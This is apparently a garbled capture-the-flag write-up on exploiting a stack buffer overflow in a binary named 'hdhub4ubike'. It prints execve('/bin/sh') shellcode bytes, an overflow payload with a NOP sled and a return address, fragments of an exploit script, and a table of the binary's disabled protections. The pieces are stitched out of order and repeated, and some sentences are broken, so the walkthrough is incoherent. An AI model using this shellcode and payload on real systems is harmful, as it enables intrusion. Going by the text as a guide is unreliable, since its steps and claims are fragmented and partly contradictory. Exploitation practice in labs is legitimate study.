Hdhub4ubike

puts(flag); return 0;

# 32‑byte execve("/bin/sh") shellcode (x86‑64) shellcode = ( b"\x48\x31\xd2" # xor rdx, rdx b"\x48\x31\xf6" # xor rsi, rsi b"\x48\xbf\x2f\x62\x69\x6e\x2f\x73\x68\x00" # movabs rdi, "/bin/sh" b"\x57" # push rdi b"\x48\x89\xe7" # mov rdi, rsp b"\xb0\x3b" # mov al, 0x3b b"\x0f\x05" # syscall )

BIN = "./hdhub4ubike" TARGET_ADDR = 0x004011a6 # address of the "puts" call that prints the flag hdhub4ubike

payload = b'A'*64 + b'B'*8 + struct.pack("<Q", 0x7fffffffe000) # address of our buffer (approx) payload = payload.ljust(0x100, b'\x90') + shellcode Running the payload spawns an interactive shell on the remote target. | Topic | What we observed in hdhub4ubike | |---------------------------|-----------------------------------| | Stack overflow | read with a length far larger than the buffer → classic overflow vector. | | Non‑PIE binaries | Fixed addresses make ROP/simple return‑to‑code trivial. | | NX disabled | Allows injection of raw shellcode on the stack. | | No canary / RELRO | Nothing blocks overwriting the saved RIP. | | Info leakage | The flag was embedded in the binary – a “cheat” that encourages bypassing logic checks. | | Best exploitation path | Return‑to‑existing puts that already has the flag address set → shortest payload, no need for ROP chain or shellcode. | 6️⃣ Full Exploit Script (Python 3) #!/usr/bin/env python3 import struct, pexpect, sys

// compare with a secret stored in the .rodata section if (strcmp(key, secret_key) != 0) return 0; | | NX disabled | Allows injection of

if __name__ == "__main__": main() Running the script prints the flag instantly:

/* ---------------------------------------------------- */ int check_key(const char *key) // key must be exactly 0x30 bytes long if (strlen(key) != 0x30) return 0; | | Best exploitation path | Return‑to‑existing puts

Therefore we want our to be 0x004011a6 . 3.2 Crafting the payload The stack layout (simplified) at the moment of the overflow: